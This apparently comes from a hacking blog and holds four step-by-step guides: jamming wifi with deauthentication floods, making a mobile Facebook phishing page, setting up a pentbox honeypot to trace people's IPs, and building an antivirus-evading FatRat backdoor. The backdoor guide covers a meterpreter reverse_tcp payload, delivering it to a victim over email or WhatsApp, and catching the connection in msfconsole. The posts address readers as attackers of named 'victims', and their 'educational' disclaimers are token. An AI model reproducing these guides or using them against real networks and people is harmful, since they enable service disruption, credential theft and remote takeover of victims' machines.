Latest Attack Wifi Jammer with kali linux 2017

Hello friends once again welcome here in this advance hacking blog.Now today we will learn all about wifi jammer.I think you are familiar about jammer,basically It is way by which one can restrict others for using wifi connection.In this blog post I'm going to use kali linux for making wifi jammer,I mean you can jam all the wifi near by you.

Suppose one router has 3 connections so you can restrict all the three device from that router this is called jamming of wifi connection in simple language.

Automatically you can disconnect all the devices or any perticular device from access wifi and in future they can't able to connect with that wifi.

So i think you have enough knowledge about whatis jammer and what is the use of it.Please remenber this ,don't use this hack to harm anyone otherwise I m not responsible for the action taken by your victim.

Now follow below given steps one by one ,and if you don't understand any particular steps please read that steps twise.

Step By Step Guide For Creating A WiFi Jammer With Kali Linux

Below are the steps:

Step:1) First of all you need to check the information of  connected wlan so open your kali linux terminal windows and enter this command iwconfig and hit enter button or you can execute this command airmon-ng and you will see all the details like driver,interface,chipset etc of your wlan ,in my case interface is wlan0. check your's

Step:2) So now you need to on the monitor mode so simply execute this command airmon-ng start wlan0 ,when you execute this command you will see the changed interface name of wlan0 to wlan0mon (Remember this new name,In next step you need to put this new name in further command)

Step:3) Now you need to monitor the wife which is detected near by you.So for this give this command airodump-ng wlanomon  and press enter will get the list of all active wifi connection,and also get the details of all connected devices with that particular wifi network.For example in my case there are 3 wifi network available here and all the three wifi has 5-5 active connection or devices.You will get detail like bssid,channel,pwr,ENC,ESSId etc of every wifi.

Step:4) Now choose the wifi network which you want to jam for others,So simply see the mac address and channel no. of any wifi router and execude this below given command

airodump-ng c 11 --bssid cb:03:23:se4:45:AD wlan0mon
Note1: Write your channel no. instead of my which is 11 and also replace the mac address with your wifi router mac address and also write your new interface name which is in my case wlan0mon.
Note2: One space after 11  and one space after bssid and one space after mac address in above give command.
Step:5) After executing above command ,your system just only monitor one wif network.Now you will see the all device connected with that particular wifi.

Step:6) Now the time come to disconnet all the devices from wifi so simply execute this command airplay-ng -0 0 -a cb:03:23:se4:45:AD(write the bssid of wifi) wlan0mon 

Step:7) Now you will see all the devices connected with this wifi network automaticaly disconnected from it till you stop it.
Note: If you want to disconnect any particular device from wifi then read next steps

Disconnect a single client

Step:8) Again give the same command which you give in step 4 which is airodump-ng c 11 --bssid cb:03:23:se4:45:AD wlan0mon

Step:9) Now note the mac address of that particular connected device and give this command airplay-ng -0 0 -a cb:03:23:se4:45:AD(write the bssid of wifi) -c [copied mac address of the device] wlan0mon

Step:10) Now in the end you can disable the monitor mode by executing this command airmon-ng stop wlan0mon.

That's it guys ,in this way you can disconnect all the device or any particular device from any particular wifi network.If you have any doubt in any steps please read the whole process twise.if you like this post please share it with your friends or social media like facebook. 

Download Mobile Friendly Facebook Phishing Page For Android And iPhone Users 2018

Hello guys hope you are doing good.Now my today's topic is how you can make mobile friendly facebook phishing page,so whenever your victim will open that page via going to your phishing link ,a mobile responsive phishing page will open which look like same as new mobile version of facebook login page.

First i'll teach you how to create phishing page for android and iphone users and in the end of the article i also provide you a direct download  link so you could easily download it with in a second.

How to get mobile friendly facebook login page source code and make phishing page from it?

Now follow below given step by step process for making your phishing page mobile friendly which is very useful for them who want to hack facebook account of a android mobile or iphone mobile user.

Step:1) Very first open your chrome browser on your mobile phone.

Step:2) After that go to via mobile browser

Step:3) Now you will see the facebook login page.

Step:4) Simply click on the url box and here you need to edit the url link so simply add view-source: in the begenning of the url.

Step:5) As you modify the url you'll see the full source code of mobile friendly facebook login page.
Note: So you can get any websites source code in mobile phone by adding same view-source:  before the actual link of any website.
Step:6) Now Simply copy all the code from their and send that source code to your computer and paste it on notepad any how.And save it with the  name index.htm

Note: I hope you already familiar about how to edit the phishing page and make it work full by modifying some text after the action parameter.If you don't know please read this post how to hack fb via phishing method so you'll get basic idea about how actually phishing attack works.

That's it friends this is the simple post for making phishing page for smartphone users.I hope you liked this post please share it with your friends too.

What Is Honeypot And How To Setup Honeypot in Kali Linux 2018

Note: The information which provided here is only for educational purpose.
This article is very important for those people who want to hack the hacker.Every hacker in all over the world want to hide their identity any how?So they never compromise with their identity but in this post we learn how you can reveal the identity of a hacker using Honeypot setup.

Actually honeypot setup is a trap by which one can easily know the actual ip and location of the hacker.So in this post i'll try to provide you every peas of information about how you can setup your own honeypot system using kali linux operating system.

Many big companies always prefer to use a smart honeypot in its organization because they don't want to compromise.Because of honeypot setup the owner of the company will easily know about the activity of the hacker later you know how is this possible? don't worry and don't confused.

Types of Honeypot?

Based on deployment honeypot may be classified as :

1. Production honeypot (For getting less information of the hacker)
2.Research honeypot (for getting full detail of the hacker,It have many feature to expose a hacker)

Based on the design criteria honeypot can be classified as:
1. Pure honeypot
2. High-interaction honeypot
3. Low-interaction honeypot
Here my motive is to see the basic setup of honeypot so i'll not provide you full information about these types of honeypot listed above.

What Type Of Information Of The Hacker You Can Hack?

You can know the following information of the hacker or anyone (Not only the hacker but also a normal person).

1. His ip address (may be static or dynamic)
2. The detail of his operating system.
3. web browser which he used
4. which port, hacker use to attack on your system.
And many more ...
So now see all the thing with the help of step by step process.

How To Set It Up Honeypot On Kali Linux Very Easily?

You need to follow below given steps as it is I provide.

Step:1) Very first before setup honeypot on your system you need to download and install a tool called pentbox-1.8  on your kali by simply using this command git clone

Note: Here in above command the url is the location of pentbox tool,i think you know about this step how to download anything from github site directly from kali os.

Step:2) And after downloading the tool simply execute this command cd pentbox-1.8/ and after that give this command Ls for going to the pentbox folder.

Step:3) Now you'll see a ruby script called pentbox.rb ,and you need to execute this script by entering this command ./pentbox.rb and press enter button. 

Step:4) Now some options will come here you need to choose option no. 2 which is network tools.So type the no. 2 and press enter button.

Step:5) After that again some option you'll see simply choose option no. 3 which is honeypot.So type no. 3 in terminal and press enter button.

Step:6) Now Here you'll need to choose a option two options (Auto configuration and second one is manual configuration.

Step:7) So Choose any one of them according to your need but here i m choosing auto configuration mode.
Note:If you want to choose manual configuration option then you can ,in manual configuration you can choose any port no. which you want to use to know the information of hacker ,suppose if hacker identify in your computer that your port no. 4444 is free for malware attack or some other attacks then obviously hacker use that port for entering in your system but they don't know you have already set up the honeypot hahahaha.
Step:8) So for auto configuration enter 1 and you'll see that the honeypot will start on port no. 80 or anything which can active for monitor your system.

Step:9) Now for checking that honeypot set up working or not simply copy your ip address by executing ifconfig command and enter that ip in any of your web browser and press enter.So after entering the ip address go towards the terminal windows and here now you'll see the full detail of the hacker.

If you want to know the actual ip of the victim or the hacker so you just need to make your ip static and send it to anyone if someone click on that link all his information automatically copied in your system in log format.If you can make your ip static then trace anyone all over the worlds with this simple honeypot method.

So guys this is the basic set up of any honeypot solution.In my next post i'll tell you the advance setup of this tool.If you like this post please share it with your friends or simply socialize it if you can.Thank you...

[PART 2] How To Generate Undetectable Payload - Backdoor 2018

Note: This post is only for educational purpose.I did't harm anyone, I used my own device during explain of this method so please don't use this method any kind of illegal or malicious activities because hacking is crime if you do this then it's can land you in jail.I'm not support any kind of illegal or malicious hacking.
Hello dear this is the part 2 of this post ,so before reading this post you need to read PART-1 because here i am going to use a popular tool along with Kali Linux OS called FatRat.So in this post I am telling you about what is FatRat tool and how to configure it in Kali Linux?

Now Today I'll teach you how you can create fully undetectable [FUD] payload which can easily bypass any antivirus securities like a charm.Your victim never suspect about it as a virus or malware attack but the reality you know.In part 1 i have already discussed about backdoor,payload and FatRat so please read that first otherwise you faced some problems during creating undetectable backdoor.

Now follow below given steps carefully one by one and read a single sentence twice if you don't understand it well.

Step By Step Process To Make A FUD Backdoor For windows pc

Step:1) In part 1 I already told you how to configure FatRat tool in Kali ,here I'm not including that .

Step:2) Now Very first open your Kali Linux terminal and give this command FatRat and press enter button

Step:3) After that FatRat tool will start and it check for all requirement  ,Now a screen will open where it gives warning that use nodistribute site instead of virustotal.So simply avoid it because It is another post which i cover in upcoming post.Simply press any key to continue.And again press any key for continue.

Step:4) Now the main screen of fatrat tool will open ,her you'll see many option but you are going to create a fully undetectable backdoor so simply choose Menu no.6 (create fud backdoor 1000% with pwnwinds) and press enter.

Step:5) Now a screen come,here you need to choose a option create a bat file+powershell which is at menu no. 1 and press enter after passing the menu no.1

Step:6) After that it will ask for Lhost ,simply here if you want to use your payload remotely then you'll need to enter your static ip here and press enter.For checking your ip simply execute this command in your terminal ifconfig

Step:7) Now enter the Lport anything like 4444

Step:8) After that enter the name of your backdoor,Give anything which you want ie: ETTpayload.

Step:9) Now  a small popup will come on your screen simply select windows/meterpreter/reverse_tcp and click on ok button

Step:10) wait for few seconds your backdoor is creating.Finally your payload will be saved in your fatrat tool >> output folder.(Actually fatrat folder present in your desktop read part 1)

Step:11) Now the screen ask for exit so enter NO because you will need this screen after some time.

Step:12) After that go to your desktop then fatrat folder >> output folder ,here you'll get your payload which you create in .bat file extension (ETTpayload)

Step:13) Simply you need to send this payload to your victim any how for example Email,WhatsApp,Facebook etc any other medium which you prefer easy.And when your victim double click on it then your payload is ready for sending the data of victim's machine.

Note:You can scan this payload by going to Nodistribute site and see the result how many antivirus is able to detect it.Simply upload your payload their and see the result.
Step:14) Now for seeing the activity of your victim go to the main menu of fatrat tool in terminal and find out the option jump to msfconsole.After that execute the associate menu no.For open console box.It will take some time.

Step:15) After opening the console box execute this command use multi/hander and then you need to execute this command set payload windows/meterpreter/reverse_tcp after the you need to set LHOST by executing this command set Lhost (Note:Enter your static ip instead of Now after that give this command show options and press enter button.

Step:16) Now in last simply give this command run and press the enter button.And when your victim double click on your payload then he will be hacked.And you can use commands in attacker machine for modifying the victim machine.If you don't know how to know the command simply in execute this command help in msfconsole box then you'll get all the commands there.

So friends this is the end of the article ,if you like this post please share it your friends.If you face some problem in any steps please drop your email by going to contact us section of this site.Hope you're enjoying my articles.Stay tuned with this blog because here you'll learn many advance ethical hacking techniques.